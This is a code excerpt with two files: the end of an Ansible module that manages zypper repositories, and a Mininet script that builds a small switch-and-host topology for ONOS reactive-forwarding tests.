rc, stdout, stderr = module.run_command(cmd, check_rc=True)
changed = rc == 0
return changed
def fail_if_rc_is_null(module, rc, stdout, stderr):
if rc != 0:
#module.fail_json(msg=stderr if stderr else stdout)
if stderr:
module.fail_json(msg=stderr)
else:
module.fail_json(msg=stdout)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=False),
repo=dict(required=False),
state=dict(choices=['present', 'absent'], default='present'),
description=dict(required=False),
disable_gpg_check = dict(required=False, default='no', type='bool'),
refresh = dict(required=False, default='yes', type='bool'),
),
supports_check_mode=False,
)
repo = module.params['repo']
state = module.params['state']
name = module.params['name']
description = module.params['description']
disable_gpg_check = module.params['disable_gpg_check']
refresh = module.params['refresh']
def exit_unchanged():
module.exit_json(changed=False, repo=repo, state=state, name=name)
rc, out = zypper_version(module)
match = re.match(r'zypper\s+(\d+)\.(\d+)\.(\d+)', out)
if not match or int(match.group(1)) > 0:
old_zypper = False
else:
old_zypper = True
# Check run-time module parameters
if state == 'present' and not repo:
module.fail_json(msg='Module option state=present requires repo')
if state == 'absent' and not repo and not name:
module.fail_json(msg='Alias or repo parameter required when state=absent')
if repo and repo.endswith('.repo'):
if name:
module.fail_json(msg='Incompatible option: \'name\'. Do not use name when adding repo files')
else:
if not name and state == "present":
module.fail_json(msg='Name required when adding non-repo files:')
if repo and repo.endswith('.repo'):
exists = repo_exists(module, old_zypper, url=repo, alias=name)
elif repo:
exists = repo_exists(module, old_zypper, url=repo)
else:
exists = repo_exists(module, old_zypper, alias=name)
if state == 'present':
if exists:
exit_unchanged()
changed = add_repo(module, repo, name, description, disable_gpg_check, old_zypper, refresh)
elif state == 'absent':
if not exists:
exit_unchanged()
changed = remove_repo(module, repo, name, old_zypper)
module.exit_json(changed=changed, repo=repo, state=state)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
lishuai12/onosfw-L3 | tools/test/topos/rftesttopo.py | 35 | 1679 | #!/usr/bin/env python
"""
"""
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.node import RemoteController
from mininet.node import Node
from mininet.node import CPULimitedHost
from mininet.link import TCLink
from mininet.cli import CLI
from mininet.log import setLogLevel
from mininet.util import dumpNodeConnections
class ReactiveForwardingTestTopo( Topo ):
"Internet Topology Zoo Specimen."
def __init__( self ):
"Create a topology."
# Initialize Topology
Topo.__init__( self )
# add nodes, switches first...
s1 = self.addSwitch( 's1' )
s2 = self.addSwitch( 's2' )
s3 = self.addSwitch( 's3' )
s4 = self.addSwitch( 's4' )
s5 = self.addSwitch( 's5' )
s6 = self.addSwitch( 's6' )
s7 = self.addSwitch( 's7' )
s8 = self.addSwitch( 's8' )
s9 = self.addSwitch( 's9' )
# ... and now hosts
h1 = self.addHost( 'h1' )
h2 = self.addHost( 'h2' )
h3 = self.addHost( 'h3' )
h4 = self.addHost( 'h4' )
# add edges between switch and corresponding host
self.addLink( s1 , h1 )
self.addLink( s2 , h2 )
self.addLink( s3 , h3 )
self.addLink( s4 , h4 )
# add edges between switches
self.addLink( s1 , s5 )
self.addLink( s2 , s5 )
self.addLink( s2 , s8 )
self.addLink( s3 , s4 )
self.addLink( s3 , s7 )
self.addLink( s4 , s5 )
self.addLink( s6 , s8 )
self.addLink( s6 , s7 )
self.addLink( s5 , s9 )
self.addLink( s6 , s9 )
topos = { 'att': ( lambda: ReactiveForwardingTestTopo() ) }
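# Usage sketch (the controller address is an assumption, not part of this
# file): the 'topos' dict above lets Mininet load this topology via the
# --custom/--topo flags, e.g.
#   sudo mn --custom rftesttopo.py --topo att --controller remote,ip=<onos-ip>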
| apache-2.0 |